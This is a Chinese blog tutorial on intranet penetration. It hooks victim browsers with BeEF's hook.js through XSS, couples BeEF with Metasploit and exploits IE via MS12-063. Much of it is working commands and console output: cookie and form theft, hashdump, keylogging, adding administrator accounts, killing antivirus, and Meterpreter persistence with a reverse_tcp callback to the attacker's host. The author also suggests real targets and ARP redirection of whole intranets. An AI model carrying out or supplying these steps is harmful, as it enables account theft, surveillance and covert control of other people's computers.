0x01:科普

Beef目前欧美最流行的WEB框架攻击平台，全称：The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞，通过一段编写好的JavaScript（hook.js）控制目标主机的浏览器，通过目标主机浏览器获得该主机的详细信息，并进一步扫描内网，配合metasploit绝对是内网渗透一大杀器。

官网 http://beefproject.com/

博客 http://blog.beefproject.com/

0x02安装

Kali linux 系统默认未安装beef，需要自行安装。

apt-get update
apt-get install beef-xss

0x03入门

0x03.1启动

主目录：

/usr/share/beef-xss

cd /usr/share/beef-xss

./beef

127.0.0.1：3000/ui/pannel

账号密码

beef/beef

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常：

访问Beef demo页面

demo页面嵌入了hook.js 访问–>中招

0x04挂马：

在正常页面添加script标签，嵌入恶意脚本

在实际渗透中（需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢？

网站反馈页面，举报页面案例：用Xss平台沦陷百度投诉中心后台

当然，这位同学用的是Xss平台，而不是beef,利用Beef的话，不仅能得到后台管理员的Cookie，再配合Metasploit，还能以管理员主机浏览器当做跳板，进入公司内网。

Online Browersers->右击->Use As Proxy

再配合ARP攻击，MITM中间人攻击，对内网内所有Http请求重定向基本…(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线（感觉好像当年玩的灰鸽子、上兴 =。= 囧）

通过浏览器，我们可以看到目标主机的很多信息：

浏览器信息：
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息：
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu （32/64）
屏幕分辨率
是否支持触屏

And So On

用火狐浏览器测试

Beef功能模块组件

常用功能/模块

Browser:获取浏览器信息
--Hooked Domain
-----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie；
-----Get From Value 获取页面提交的表单信息：截获填写的银行卡信息、注册页面的用户名密码；
-----Redirect Browser 浏览器重定向

执行后，目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击，将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面…(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host：获取受害者主机信息
Mtasploit:结合Metasploit进行渗透，这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering：社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml

  metasploit:
enable: false

改成

metasploit:
enable: true

vim /usr/share/beef-xss/config.yaml

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true

vim /usr/share/beef-xss/extensions/metasploit/config.yaml

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [ 
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]

原：

 

{os: 'custom', path: ''}

修改成

{os: 'custom', path: '/usr/share/metasploit-framework/'}

修改 host callback_host两参数，改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

msfconsole #启动Metasploit

load msgrpc ServerHost=172.16.244.129 Pass=abc123

重启Beef

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台（莫名成了245 =。=！）

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

靶机被强行跳转到被监听的URL

MSF成功监听到（但，貌似是虚拟机装的XP把这个漏洞补了，所以没产生session会话）

如果XP没有打补丁，即存在这个EXP针对的漏洞，这里会产生一个session会话

session -i 1

screenshot 截屏：截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

0x06更多Meterpreter的命令

参考：

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

上一篇 内网渗透一：利用Xss漏洞进入内网 的文章里，

0x01填坑：

我在这里填一下上一篇文章中的坑哈：

我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP，但是执行之后发现目标主机虽然跳转了，但是有个报错：

（接第一篇）靶机被强行跳转到被监听的URL

MSF成功监听到

（但，貌似是虚拟机装的XP把这个漏洞补了，所以没产生session会话）

过后查了这个原因好久，在Mickey牛的教导下，终于发现了报错的原因：

msf下输入 exploit/windows/browser/ie_execcommand_uaf

0x02找到问题：

执行info，查看该EXP的信息，发现这个EXP原来是针对XP SP3、Vista的IE7、IE8以及Win7的IE8、IE9。

msf exploit(ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability 
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Description:
  This module exploits a vulnerability found in Microsoft Internet 
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object 
  gets deleted in an unexpected manner, but the same memory is reused 
  again later in the CMshtmlEd::Exec() function, leading to a 
  use-after-free condition. Please note that this vulnerability has 
  been exploited in the wild since Sep 14 2012. Also note that 
  presently, this module has some target dependencies for the ROP 
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present 
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, 
  JRE 1.6.x or below must be installed (which is often the case).
References:

http://cvedetails.com/cve/2012-4969/

http://www.osvdb.org/85532

http://www.microsoft.com/technet/security/bulletin/MS12-063.mspx

http://technet.microsoft.com/en-us/security/advisory/2757760

http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

然后默默地去下载了XP SP3、安装IE7（刚安装好的XP SP3使用的是IE6）

（安装、重启、重新操作了第一篇里的步骤 So 省略若干字….）

0x03 EXP successful：

终于，返回了successful！

sessions：
sessions -i 1

sysinfo ipconfig ps hashdump…

0x04常用命令：

截屏：

screenshot

键盘记录：

meterpreter > run post/windows/capture/keylog_recorder 
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...

 

 

执行cmd:

meterpreter>shell

 

添加用户：

net user add name password /add

 

添加用户到管理组：

net localgroup administrator name /add

 

因为是内网 开启3389也没什么意义了

 

Kill 杀软

meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*]  Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...

 

控制持久化

meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPOTR
exploit

在meterpreter下使用Windows API编程，以弹Hello world窗示例

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

 

 

0x05更多Meterpreter的命令

参考：

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

0x06感谢

感谢全能Mickey牛和玄大：玄魂

雪碧 http://weibo.com/520613815

2015-03-19

原文：

http://bobao.360.cn/learning/detail/300.html

http://bobao.360.cn/learning/detail/312.html